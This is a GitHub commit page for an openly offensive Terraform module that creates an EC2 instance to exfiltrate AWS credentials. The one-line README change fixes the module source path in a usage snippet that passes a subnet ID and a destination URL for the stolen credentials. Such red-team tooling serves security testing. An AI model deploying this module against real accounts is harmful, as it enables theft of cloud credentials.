Skip to content

Commit

Permalink
Fix usage source path
Browse files Browse the repository at this point in the history
  • Loading branch information
iganbold committed Sep 5, 2020
1 parent d6f587b commit 112e69c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ Offensive Terraform module which creates EC2 instance and exfiltrate credential
## Usage
```
module "ec2_instance_credential_exfiltration" {
source = "offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration"
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
subnet_id = "subnet-0a4a1cc04"
url = "http://0.0.0.0/
Expand Down

0 comments on commit 112e69c

Please sign in to comment.